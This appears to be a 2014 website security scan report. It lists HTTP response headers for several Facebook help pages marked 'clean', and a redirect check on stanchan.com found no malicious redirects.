https://www.facebook.com/help | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:41 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=YdKgVA1tbTBVGMs6RMBcRTpO; expires=Wed, 28-Dec-2016 04:02:41 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: n1Kk3SOb80e/RrIh0TCq04Ol4ccdSLe1WI7wixRYpNl4OHlvHyye5FwuObetJaeXx7MIFCsM4qVHTpIprwHf5A== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help?_fb_noscript=1 | 200 OK Content-Length: 56775 Content-Type: text/html | clean |
https://www.facebook.com/help/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:42 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=YtKgVElBbvGmDJKNycOVN9Lx; expires=Wed, 28-Dec-2016 04:02:42 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 5jMJ51AJi+0qHbp5unpDYCxhV7PDMAjhNkp83dT70/2DGcDJ3SSqqX9ZZS5Z2rdihDU4BGYDAbIgYmMfiEMp8A== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/?_fb_noscript=1 | 200 OK Content-Length: 56787 Content-Type: text/html | clean |
https://www.facebook.com/help/292105707596942 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:44 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=Y9KgVNv6eS2_yVTinKdezAUR; expires=Wed, 28-Dec-2016 04:02:43 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F292105707596942; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: D5iehr1k5VzdQw2isTXFAh4xnojHsBULTitsgNxYx6M999wok/pYJMcvCg92+RX25x0gfXU4ysAStZwurLTNzA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/292105707596942?_fb_noscript=1 | 200 OK Content-Length: 108779 Content-Type: text/html | clean |
https://www.facebook.com/help/393592270693739 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:45 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZdKgVK676vRN4CrnVa7phvDs; expires=Wed, 28-Dec-2016 04:02:45 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F393592270693739; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 3v9XDAzXmyIFDL0SgLUEEuLzQ4F7vblQ+wFaN2KPpMtrQ6pAzlj12y72byFDSGCUBMCfMRqFzmaHlDHucR3E8g== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/393592270693739?_fb_noscript=1 | 200 OK Content-Length: 53765 Content-Type: text/html | clean |
https://www.facebook.com/help/133234170146522 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:47 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZtKgVIJMpr88WrSkO76VypJ8; expires=Wed, 28-Dec-2016 04:02:46 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F133234170146522; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: AnDFH1tsXGKM+qVpGvz6ozXlhDBbkcr5oRLtQLjDV0V/vnsASxXsZVH6npZQ/EjewpbGkPcFcBJ+o8hf9c/bZA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/133234170146522?_fb_noscript=1 | 200 OK Content-Length: 51138 Content-Type: text/html | clean |
https://www.facebook.com/help/345121355559712 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:48 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=aNKgVLMwG0T0umUNroPgSCMo; expires=Wed, 28-Dec-2016 04:02:48 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F345121355559712; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F345121355559712; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: XSsI2GudzCWrmmbJU7D+cIZh1QZbaDBwGBWDRA2888VrX6Lp6V+bNW0VpktAe62GcpA4IbYBmNFklpyRL01O3w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/345121355559712?_fb_noscript=1 | 200 OK Content-Length: 81150 Content-Type: text/html | clean |
https://www.facebook.com/help/376335499080938 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:49 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=adKgVL1dyxOLQX92gz_WlUbP; expires=Wed, 28-Dec-2016 04:02:49 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F376335499080938; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2F376335499080938; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: yTfy2HaCVEaTRciORHThGj9wytLPd/vXoLmq0if8FpzhT9/P0H4QPl6EPOVSyd0UY+LBbGsTOC4SowOm8VugeA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/376335499080938?_fb_noscript=1 | 200 OK Content-Length: 72082 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stanchan.com
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 04:02:25 GMT
Accept-Ranges: bytes
ETag: "16875b28217dcb1:d70dd"
Server: Microsoft-IIS/6.0
Content-Length: 20538
Content-Location: http://stanchan.com/welcome.html
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 19:39:27 GMT
X-Powered-By: ASP.NET
...20538 bytes of data.
GET / HTTP/1.1
Host: stanchan.com
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 04:02:25 GMT
Accept-Ranges: bytes
ETag: "16875b28217dcb1:d70dd"
Server: Microsoft-IIS/6.0
Content-Length: 20538
Content-Location: http://stanchan.com/welcome.html
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 19:39:27 GMT
X-Powered-By: ASP.NET
...20538 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stanchan.com
Referer: http://www.google.com/search?q=stanchan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stanchan.com
Referer: http://www.google.com/search?q=stanchan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.